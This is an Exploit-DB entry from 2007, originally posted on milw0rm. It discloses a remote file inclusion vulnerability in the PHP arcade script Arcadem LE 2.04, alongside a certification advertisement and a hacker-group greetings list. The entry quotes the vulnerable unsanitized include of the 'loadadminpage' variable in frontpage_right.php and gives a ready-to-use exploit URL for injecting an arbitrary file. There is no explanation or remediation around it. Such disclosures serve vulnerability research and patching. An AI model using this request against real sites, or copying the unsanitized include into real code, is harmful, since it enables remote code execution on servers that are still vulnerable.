Arcadem LE 2.04 - 'loadadminpage' Remote File Inclusion

EDB-ID:

4764


Author:

KnocKout

Type:

webapps


Platform:

PHP

Date:

2007-12-21


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Arcadem LE <= 2.04 Remote File Include Vulnerability

 

Author : KnocKout
Greetz to : CoRSaNTuRK , BORDO , CWneSTer , By-Ajan , User , 44ahmetov , CoBRa_21 , Khirash , CWSearcher , idam
Cyber-Warrior / CW Exploiter TIM

--------------------------------------

Script : Arcadem LE
Version : 2.04
Download : http://www.agaresmedia.com/downloads/Arcadem_LE_2.04.zip

=======================================================

Vulnerability in frontpage_right.php ;


  <?PHP include($loadadminpage); ?>


Exploit : http://localsite/path/admin/frontpage_right.php?loadadminpage=[File]

=========================================================

# milw0rm.com [2007-12-21]